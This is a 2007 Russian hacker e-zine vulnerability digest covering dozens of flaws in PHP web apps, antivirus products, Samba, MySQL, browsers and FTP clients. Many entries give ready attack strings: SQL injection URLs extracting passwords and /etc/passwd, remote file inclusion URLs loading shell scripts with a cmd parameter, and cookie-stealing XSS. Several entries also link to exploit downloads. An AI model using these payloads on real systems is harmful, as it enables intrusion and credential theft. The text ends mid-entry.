>> Bugtrack
Автор: sk.r[00]t
~~~~~~~~~~~~~~~~~~

>> intR0

	Вот самая первая пачка Багтрака езиноса :)
	Думаю ты  будешь используешь эту инфу по назначению...
	З.Ы. По мере выхода новых номеров этого езина, bugtraq будет модернизироваться
	как графически, так и в плане качества обзора багов.

	З.Ы. Внизу тебя ждёт сюрприз! %-)


		>>> T.O. B.E. C.O.N.T.I.N.U.E.D. <<<



[ 08 февраля, 2007 ]

Переполнение буфера в RARLabs Unrar

Программа:
RARLabs Unrar 3.60 for Linux
RARLabs Unrar 3.61 for Windows

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке архивов, защищенных паролем. 
Атакующий может передать специально сформированные архивы, что приведет к выполнению произвольного кода с 
привилегиями пользователя, открывшего архив.




[ 08 февраля, 2007 ]

Переполнение буфера в Trend Micro AntiVirus

Программа:
Trend Micro's PC-Cillin Internet Security 2007
ServerProtect for Linux v2.5 on RHEL 4.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в сканирующем движке (VsapiNI.sys) в проверке входных данных при 
обработке запакованных UPX исполняемых файлов. Атакующий может передать специально сформированные UPX файлы, 
что приведет к выполнению произвольного кода.




[ 08 февраля, 2007 ]

Обход ограничений безопасности в Advanced Poll

Программа: Advanced Poll 2.0.5-dev

Уязвимость позволяет удаленному злоумышленнику обойти механизм аутентификации на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных. Атакующий может обойти механизм аутентификации 
и получить доступ к сессии под учетной записью администратора.

Эксплоит: http://www.xakep.ru/post/36667/Advanced_Poll_admin_session_gen_exploit.txt




[ 08 февраля, 2007 ]

Повышение привилегий в Trend Micro Antivirus

Программа:
Trend Micro's PC-Cillin Internet Security 2007
TmComm.sys version 1.5.0.1052

Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями 
на целевой системе. Уязвимость существует из-за ошибки в TmComm.sys, входящего в состав антивирусного ядра. 
Небезопасные полномочия на доступ на запись для "Everyone" присваиваются \\.\TmComm интерфейсу DOS устройства. 
Локальный атакующий может получить доступ к IOCTLs, который предназначен только для привилегированных пользователей. 
В результате атакующий может выполнить произвольный код с привилегиями ядра.




[ 08 февраля, 2007 ]

PHP-инклюдинг в AgerMenu

Программа: AgerMenu 0.01

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «rootdir» сценарием top.inc.php. 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?




[ 08 февраля, 2007 ]

PHP-инклюдинг в WebMatic

Программа: WebMatic 2.6

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметрах «P_LIB» и «P_INDEX» 
сценарием index_album.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой 
системе с привилегиями Web сервера.

Примеры:

[Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

[Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt




[ 08 февраля, 2007 ]

PHP-инклюдинг в Maian Recipe

Программа: Maian Recipe 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметрах «path_to_folder» 
сценарием class_mail.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой 
системе с привилегиями Web сервера.

Пример:

http://www.SITE.com/path/classes/class_mail.inc.php?path_to_folder=[shell]




[ 08 февраля, 2007 ]

SQL-инъекция и межсайтовый скриптинг в OTSCMS

Программа: OTSCMS 2.1.5

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и 
осуществить XSS нападение. Уязвимость существует из-за недостаточной обработки входных данных в параметре «command» 
сценарием priv.php и в параметре «module» сценарием forum.php. Удаленный пользователь может с помощью специально 
сформированного запроса выполнить произвольные SQL команды в базе данных приложения и осуществить XSS нападение.

Пример:

SQL:
http://[target]/[path]/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts

XSS:
http://[target]/[path]/forum.php?module=User&command=profile&name=<script>alert(document.cookie);</script>




[ 08 февраля, 2007 ]

Выполнение произвольных команд в SysCP

Программа: SysCP 1.x

Найденные уязвимости позволяют удаленному злоумышленнику выполнить произвольный код на целевой системе.

1) Уязвимость существует из-за ошибки в проверке имен директорыи в домашнем каталоге пользователя. 
 Когда пользователь защищает эту директорию с помощью панели управления атакующий может использовать сценарий 
 cron для выполнения произвольных команд с привилегиями root.
2) Уязвимость существует из-за ошибки в проверке файлов из базы данных в таблице "panel_cronscript" 
 сценарием "scripts/cronscript.php". Атакующий может выполнить произвольные сценарии PHP с привилегиями root.

Успешное эксплуатирование уязвимости требует наличия доступа к базе данных.

Эксплоит: Нет




[ 08 февраля, 2007 ]

Обход ограничений безопасности в pam_ssh

Программа: pam_ssh 1.x

Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. 
Уязвимость существует из-за того, что pam_ssh не правильно ограничивает использование приватных ключей с пустым паролем, 
даже если опция "allow_blank_password" выключена. Атакующий может использовать приватные ключи с пустыми паролями, 
и вводить произвольные не пустые пароли при запросе.

Эксплоит: Нет




[ 08 февраля, 2007 ]

Межсайтовый скриптинг в MoinMoin

Программа: MoinMoin 1.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. 
Уязвимость существует из-за недостаточной обработки входных данных в параметрах «page info» и «page name». 
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Эксплоит: Нет




[ 08 февраля, 2007 ]

PHP-инклюдинг в Site-Assistant

Программа:  Site-Assistant 0990

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «paths[version]» сценарием menu.php. 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит: Да (http://www.xakep.ru/post/36682/Site-Assistant_Remote_File_Include_Exploit.txt)




[ 08 февраля, 2007 ]

Межсайтовый скриптинг в vBulletin

Программа:  vBulletin 3.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. 
Уязвимость существует из-за недостаточной обработки входных данных в поле формы «Extension» сценарием 
admincp/attachment.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте 
безопасности уязвимого сайта.

Эксплоит: Нет




[ 08 февраля, 2007 ]

SQL-инъекция в LightRO CMS

Программа: LightRO CMS 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «projectid» сценарием index.php. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в 
базе данных приложения.

Эксплоит: Да (http://www.xakep.ru/post/36684/LightRO_CMS_Remote_SQL_Injection_Exploit.txt)




[ 08 февраля, 2007 ]

SQL-инъекция в LushiNews

Программа:  LushiNews 1.01

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных 
приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием 
comments.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить 
произвольные SQL команды в базе данных приложения.

Наличие эксплоита: Да (линк: http://www.xakep.ru/post/36685/LushiNews_Remote_SQL_Injection_Exploit.txt)




[ 08 февраля, 2007 ]

SQL-инъекция в LushiWarPlaner

Программа:  LushiWarPlaner 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в 
базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в 
параметре «id» сценарием register.php. Удаленный пользователь может с помощью специально сформированного 
запроса выполнить произвольные SQL команды в базе данных приложения.

Наличие эксплоита: да (линк: http://www.xakep.ru/post/36686/LushiWarPlaner_Remote_SQL_Injection_Exploit.txt)




[ 08 февраля, 2007 ]

Программа: Mozilla Firefox 1.5.0.9, возможно более ранние версии.

Опасность: Низкая

Наличие эксплоита: Нет

Описание:

Обнаруженные уязвимости позволяют удаленному пользователю получить доступ к важным данным на системе.
1. Уязвимость существует из-за того, что заблокированные всплывающие окна (попапы) выполняются
 с привилегиями локальной зоны, что позволяет злоумышленнику обойти межзоновые ограничения
 и прочитать произвольные file:// URI. Для успешной эксплуатации уязвимости злоумышленник должен заставить
 пользователя отобразить заблокированный попап.

2. Уязвимость существует из-за того, что функция nsExternalAppHandler::SetUpTempFile создает файлы с
 предсказуемыми именами, основанными на времени создания, что позволяет злоумышленнику выполнить произвольный
 код сценария с помощью специально сформированного XMLHttpRequest запроса.

Совместно с уязвимостью #1 злоумышленник может сохранить на локальной системе специально сформированный
 HTML файл и выполнить его в браузере жертвы в контексте безопасности локальной зоны.

URL производителя: www.mozilla.com




[ 08 февраля, 2007 ]

Программа: FreeProxy 3.81 build 1511, возможно более ранние версии.

Опасность: Низкая

Наличие эксплоита: Нет

Описание:

Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.
Уязвимость существует из-за ошибки при обработке HTTP заголовка "Host". Удаленный пользователь может с
помощью специально сформированного GET запроса вызвать отказ в обслуживании приложения.

URL производителя: www.alphalink.com.au/~gregr/freeproxy.htm

Решение: Установите последнюю версию (build 1626 или выше) с сайта производителя.




[ 08 февраля, 2007 ]

Программа: avast! Server Edition версии до 4.7.726.

Опасность: Низкая

Наличие эксплоита: Нет

Описание:

Уязвимость позволяет локальному пользователю обойти некоторые ограничения безопасности.
Уязвимость существует из-за того, что приложение не требует пароль для изменения некоторых 
настроек, даже если пароль установлен.

URL производителя: www.avast.com/eng/avast_4_server.html

Решение: Установите последнюю версию (4.7.726) с сайта производителя.

Ссылки:
http://www.avast.com/eng/avast-4-server-revision-history.html




[ 08 февраля, 2007 ]

Программа: STLport версии до 5.0.3.

Опасность: Низкая

Наличие эксплоита: Нет

Описание:

Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании или 
скомпрометировать целевую систему.

1. Уязвимость существует из-за неизвестной ошибки при обработке чисел с плавающей точкой.
 Удаленный пользователь может вызвать переполнение буфера.
2. Уязвимость существует из-за неизвестной ошибки в rope конструкторах, которая позволяет
 злоумышленнику вызвать переполнение буфера.

URL производителя: stlport.sourceforge.net

Решение: Установите последнюю версию (5.0.3) с сайта производителя. 




[ 08 февраля, 2007 ]

Программа: FlashChat 4.7.8, возможно более ранние версии.

Опасность: Низкая

Наличие эксплоита: Нет

Описание:

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в поле названия 
комнаты в сценарии info.php. Удаленный пользователь может с помощью специально сформированного 
запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: www.tufat.com/s_flash_chat_chatroom.htm

Решение: Способов устранения уязвимости не существует в настоящее время. 




[ 08 февраля, 2007 ]

Программа: VirtueMart 1.0.7, возможно более ранние версии.

Опасность: Средняя

Наличие эксплоита: Нет

Описание:

Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить 
произвольные SQL команды в базе данных приложения.

1. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь
 может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
2. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь
 может с помощью специально сформированного запроса выполнить произвольный код сценария в
 браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: virtuemart.net

Решение: Установите последнюю версию (1.0.8) с сайта производителя. 




[ 08 февраля, 2007 ]

Программа: Samba версии до 3.0.24.

Опасность: Средняя

Наличие эксплоита: Нет

Описание:

Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании или 
выполнить произвольный код на целевой системе.

1. Уязвимость существует из-за того, что при некоторых обстоятельствах smbd не удаляет запросы
 из файла очереди. Злоумышленник может вызвать зацикливание приложения во время переименования файла.
2. Samba использует имена файлов как параметры форматной строки при вызове функции "sprintf()" во время
 установки списков доступа Windows с использованием VFS плагина afsacl.so. Удаленный пользователь может
 выполнить произвольный код на целевой системе. Для успешной эксплуатации уязвимости файловая система
 AFS должна быть доступной CIFS клиентам посредством afsacl.so VFS модуля и атакующий должен иметь
 привилегии на запись в общую папку.

URL производителя: www.samba.org

Решение: Установите последнюю версию (3.0.24) с сайта производителя. 




[ 08 февраля, 2007 ]

Программа: SMA-DB 0.3.9, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "pfad_z" в сценарии 
theme/settings.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе 
с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена 
в конфигурационном файле PHP. Пример:

http://[host]/theme/settings.php?pfad_z=[file]

URL производителя: people.ee.ethz.ch/~dmaeder/bluevirus/main.php?tpc=programs

Решение: Способов устранения уязвимости не существует в настоящее время.




[ 08 февраля, 2007 ]

Программа: DreamStats 4.2, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Нет

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "rootpath" в сценарии 
index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с 
привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть 
включена в конфигурационном файле PHP.

URL производителя: mnprojects.com/dreamstats/

Решение: Установите последнюю версию 5.0 с сайта производителя.




[ 08 февраля, 2007 ]

Программа: phpBB++ Build 101, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в 
сценарии includes/functions.php. Удаленный пользователь может выполнить произвольный PHP сценарий на 
целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" 
должна быть включена в конфигурационном файле PHP.

URL производителя: sourceforge.net/projects/phpbbplusplus/

Решение: Способов устранения уязвимости не существует в настоящее время.




[ 08 февраля, 2007 ]

Программа: HLstats версии до 1.35

Опасность: Низкая

Наличие эксплоита: Нет

Описание:

Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в классе поиска. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный 
код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: www.unitedadmins.com/index.php?p=content&content=hlstats

Решение: Установите последнюю версию (1.35) с сайта производителя. 




[ 08 февраля, 2007 ]

Программа: Samba 3.0.21 - 3.0.23d на Sun Solaris

Опасность: Средняя

Наличие эксплоита: Нет

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки проверки границ данных в функциях "gethostbyname()" и "getipnodebyname()" 
в библиотеке "nss_winbind.so.1". Удаленный пользователь может с помощью слишком длиной строки, переданной интерфейсу 
NSS, вызвать переполнение буфера и выполнить произвольный код на целевой системе. Для успешной эксплуатации 
уязвимости должен быть запущен демон winbindd, сконфигурированный на использование библиотеки "nss_winbind.so.1".

URL производителя: www.samba.org

Решение: Установите последнюю версию (3.0.24) с сайта производителя.

Источник:
CVE-2007-0453: Buffer overrun in NSS host lookup Winbind library on Solaris




[ 07 февраля, 2007 ]

Программа: Blue Coat WinProxy 6.1a и 6.0 r1c, возможно более ранние версии.

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный 
код на целевой системе.
Уязвимость существует из-за ошибки при обработке HTTP CONNECT запросов. Удаленный пользователь может 
послать прокси серверу специально сформированный запрос CONNECT, вызвать переполнение динамической памяти 
и выполнить произвольный код на целевой системе.

URL производителя: www.winproxy.com

Решение: Установите последнюю версию (6.1r1c) с сайта производителя.

Источник:
Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability





[ 07 февраля, 2007 ]

Программа: Blue Coat WinProxy 6.1a и 6.0 r1c, возможно более ранние версии.

Опасность: Средняя

Наличие эксплоита: Нет

Описание:

Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный 
код на целевой системе.
Уязвимость существует из-за ошибки при обработке HTTP CONNECT запросов. Удаленный пользователь может 
послать прокси серверу специально сформированный запрос CONNECT, вызвать переполнение динамической памяти и 
выполнить произвольный код на целевой системе.

URL производителя: www.winproxy.com

Решение: Установите последнюю версию (6.1r1c) с сайта производителя.

Источник:
Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability




[ 07 февраля, 2007 ]

Межсайтовый скриптинг в KDE Konqueror KHTML библиотеке

Программа: KDE 3.5.6

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. 
Уязвимость существует из-за недостаточной обработки входных данных в HTML страницах в тегах <title>. 
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

<title>myblog<!--</title></head><body><script> src=http://beanfuzz.com/bean.js> --></title>




[ 07 февраля, 2007 ]

Отказ в обслуживании в Comodo Firewall

Программа:
Comodo Firewall Pro 2.4.16.174
Comodo Personal Firewall 2.3.6.81

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных данных в драйвере CMDMon.SYS. 
Атакующий может передать специально сформированные данные, что приведет к отказу приложения в обслуживании.

Эксплоит: http://www.xakep.ru/post/36655/Comodo_Firewall_DoS_exploit.txt




[ 07 февраля, 2007 ]

Отказ в обслуживании в Microsoft Internet Explorer

Программа: Microsoft Internet Explorer 6.0

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных данных в msxml3 модуле при обработке XML файлов 
с большим числом наследуемых тегов (10-1000), перерисовываемых в IFRAME каждые 50-100 миллисекунд. 
Атакующий может обманным образом заставить пользователя зайти на злонамеренный сайт, содержащий специально 
сформированные XML страницы, что приведет к отказу системы в обслуживании.

Пример:

http://lcamtuf.coredump.cx/iediex/iediex.html




[ 07 февраля, 2007 ]

SQL-инъекция в Kisisel Site

Программа: Kisisel Site 2007

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «sayfa» сценарием forum.asp. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды 
в базе данных приложения.

Пример:

http://[SITE]/forum.asp?sayfa=konular&forumid=-1%20union+all+select+0,kullaniciadi,2,3,sifre,5,6,7+from+admin




[ 07 февраля, 2007 ]

PHP-инклюдинг в LightRO CMS

Программа: LightRO CMS 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «dateien[news]» сценарием inhalt.php. 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

//inhalt.php?dateien[news]=http://[target]/[path]/shell.x




[ 07 февраля, 2007 ]

Отказ в обслуживании в SmartFTP Client

Программа: SmartFTP Client 2.0.1002

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке баннеров. 
Атакующий может передать специально сформированные баннеры длиной более 5000 байт, что приведет к отказу приложения 
в обслуживании.

Эксплоит: http://www.xakep.ru/post/36647/SmartFTP_Client_Heap_Overflow_DoS_exploit.txt




[ 07 февраля, 2007 ]

Отказ в обслуживании в FlashFXP

Программа: FlashFXP 3.4.0 build 1145

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке PWD команд. 
Атакующий может передать специально сформированные PWD команды, размером более 5420 байт, 
что приведет к отказу приложения в обслуживании.

Эксплоит: http://www.xakep.ru/post/36646/FlashFXP_Buffer_Overflow_DoS_exploit.txt




[ 07 февраля, 2007 ]

Переполнение буфера в Alibaba Alipay

Программа: Alibaba Alipay

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных в китайской системе on-line платежей Alipay. 
Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

Эксплоит: http://www.xakep.ru/post/36645/Alibaba_Alipay_Remote_Code_Execution_exploit.txt




[ 07 февраля, 2007 ]

Выполнение произвольного кода в MySQL

Программа: MySQL 4.x/5.0

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в использовании UDF (User Defined Functions) механизма. 
Атакующий может выполнить произвольный код на целевой системе.

Эксплоиты:

http://www.0xdeadbeef.info/exploits/raptor_winudf.tgz
http://www.milw0rm.com/sploits/02062007-raptor_winudf.tgz




[ 06 февраля, 2007 ]

Повышение привилегий в X-Kryptor Secure Client

Программа: X-Kryptor Secure Client

Уязвимость позволяет удаленному злоумышленнику выполнить вредоносные действия с повышенными привилегиями 
на целевой системе. Уязвимость существует из-за того, что приложение позволяет пользователю вручную открыть 
окно Explorer в контексте оригинального приложения (обычно с правами SYSTEM), нажав F1 во время предоставления 
приглашения на ввод учетных данных RSA. Атакующий может выполнить произвольный код с повышенными привилегиями.




[ 06 февраля, 2007 ]

Предсказуемый идентификатор сессии в Jetty

Программа:
Jetty 3.x
Jetty 4.x
Jetty 5.x
Jetty 6.x

Уязвимость позволяет локальному злоумышленнику получить несанкционированный доступ к конфиденциальной 
информации на целевой системе. Уязвимость существует из-за того, что приложение генерирует предсказуемые 
идентификаторы сессий. Атакующий может подобрать соответствующий идентификатор и получить конфиденциальные 
данные, доступные при установлении сессионного соединения.




[ 06 февраля, 2007 ]

Нарушение конфиденциальности информации в HP True64

Программа: HP True64 Alpha OSF1 5.1

Уязвимость позволяет локальному злоумышленнику получить несанкционированный доступ к 
конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки, позволяющей 
непривилегированным пользователям увидеть значения всех переменных окружения процессов. Локальный 
атакующий может выполнить в командной строке команду вида «/usr/ucb/ps auxeww», что позволит ему просмотреть 
значения всех переменных окружения.

Эксплоит: http://www.xakep.ru/post/36640/HP_True64_Alpha_exploit.txt




[ 06 февраля, 2007 ]

Отказ в обслуживании в MS Internet Explorer

Программа: MS Internet Explorer 6

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки разыменования нулевого указателя в mshtml.dll. 
Атакующий может передать специально сформированные данные, что приведет к отказу приложения в обслуживании.

Эксплоит: http://www.xakep.ru/post/36627/Microsoft_Internet_Explorer_DoS_exploit.txt




[ 05 февраля, 2007 ]

SQL-инъекция в Oracle

Программа:  Oracle 9i/10g

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует из-за недостаточной обработки входных данных при использовании dbms_export_extension. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в 
базе данных приложения.

Эксплоит: http://www.xakep.ru/post/36625/Oracle_SQL_Injection_exploit.txt




[ 05 февраля, 2007 ]

Межсайтовый скриптинг в MediaWiki

Программа:  MediaWiki 1.x

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. 
Уязвимость существует из-за недостаточной обработки входных данных в функциональности «sortable table». 
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.




[ 05 февраля, 2007 ]

PHP-инклюдинг в Simple Invoices

Программа:  Simple Invoices

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «module» и «view» 
сценарием controller.php. Удаленный пользователь может выполнить произвольный PHP сценарий на 
целевой системе с привилегиями Web сервера 

Пример:

http://www.Site.com/theme/settings.php?pfad_z=[Shell]




[ 05 февраля, 2007 ]

PHP-инклюдинг в Geeklog

Программа:  Geeklog 2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «glConf[path_libraries]» 
сценарием BaseView.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой 
системе с привилегиями Web сервера. 

Пример:

v.Cc/[path]/system/libraries/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=Evil.txt?




[ 05 февраля, 2007 ]

Обход ограничений безопасности в продуктах Avaya

Программа: 
Avaya Converged Communications Server (CCS) 2.x
Avaya Converged Communications Server (CCS) 3.x
Avaya Intuity LX
Avaya Message Networking 2.x
Avaya Modular Messaging 2.x
Avaya Modular Messaging 3.x
Avaya S8XXX Media Servers
Avaya SIP Enablement Services (SES) 3.x

Уязвимость позволяет удаленному злоумышленнику обойти ограничения безопасности на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных в OpenSSH в мониторе распределения привилегий. 
Атакующий может выполнить злонамеренные действия, что позволите ему обойти процесс аутентификации.




[ 05 февраля, 2007 ]

Программа: 
Avaya Call Management System (CMS)
Avaya Interactive Response 1.x

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных данных в Sun Solaris rpcbind. 
Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.




[ 05 февраля, 2007 ]

Переполнение буфера в Ipswitch IMail Server and Collaboration Suite

Программа:  Ipswitch IMail Server and Collaboration Suite

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных в демоне SMTP. Атакующий может передать 
специально сформированные данные, что приведет к выполнению произвольного кода.

Эксплоиты: 
http://www.securityfocus.com/data/vulnerabilities/exploits/19885_imail.txt
http://www.securityfocus.com/data/vulnerabilities/exploits/imail_smtp_rcpt_overflow.pm
http://www.securityfocus.com/data/vulnerabilities/exploits/Imail_smtp_rcp_rexp.pl




[ 05 февраля, 2007 ]

SQL-инъекция в Woltlab Burning Board Lite

Программа: Woltlab Burning Board Lite 1.0.2pl3e

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «folderid» сценарием pms.php. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды 
в базе данных приложения.

Эксплоит: http://www.xakep.ru/post/36614/Woltlab_Burning_Board_Lite_sql_injection_exploit.txt




[ 05 февраля, 2007 ]

SQL-инъекция в Photo Galerie Standard

Программа: Photo Galerie Standard 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием view.php. 
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в 
базе данных приложения.

Пример:

//view.php?id=-1%20union%20select%201,load_file(char((47, 101,116,99,47,112,97,115,115,119,100)),3,4,0,0,0,0,0,0,0,0,0,0/ *&categorie=8&next=1




[ 05 февраля, 2007 ]

PHP-инклюдинг в KDPics

Программа: KDPics 1.11

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «lib_path» сценарием exif.php 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.victime.com/[KDPics_path]/lib/exifer/exif.php?lib_path?=Evil.txt?cmd




[ 05 февраля, 2007 ]

PHP-инклюдинг в Flip

Программа: Flip 2.01 final

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. 
Уязвимость существует из-за недостаточной обработки входных данных в параметре «theme» сценарием previewtheme.php. 
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://Www.Victim.Com/[path]/[path]/previewtheme.php? theme=1&inc_path=Evil.txt?cmd




[ 05 февраля, 2007 ]

Отказ в обслуживании в Chicken of the VNC

Программа: Chicken of the VNC 2.0

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в ошибки разыменования нулевого указателя. Атакующий может передать 
специально сформированные данные, что приведет к отказу системы в обслуживании.

Эксплоит: http://www.xakep.ru/post/36610/Chicken_of_the_VNC_DoS_exploit.txt




[ 05 февраля, 2007 ]

Отказ в обслуживании в Remotesoft .NET Explorer

Программа: Remotesoft .NET Explorer 2.0.1

Уязвимость позволяет локальному злоумышленнику выполнить DoS атаку на целевую систему. 
Уязвимость существует из-за ошибки в проверке входных данных большого размера (около 80000 байт). 
Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.

Эксплоит: http://www.xakep.ru/post/36609/Remotesoft_NET_Explorer_Stack_Overflow_exploit.txt




[ 05 февраля, 2007 ]

Переполнение буфера в Microsoft Word

Программа: Microsoft Word 2000

Уязвимость позволяет локальному злоумышленнику выполнить произвольный код на целевой системе. 
Уязвимость существует из-за ошибки в проверке входных данных при обработке документов MS Word. 
Атакующий может передать специально сформированные документы, что приведет к выполнению произвольного кода.

Пример:

http://www.milw0rm.com/sploits/02032007-word2000exp.doc

Эксплоит: см. выше, а также сплоит можно найти в архиве milw0rm.tar.bz2 который входит в состав езиноса.




[ 05 февраля, 2007 ]

Переполнение буфера в Imail

Программа: Imail 8.10-8.12

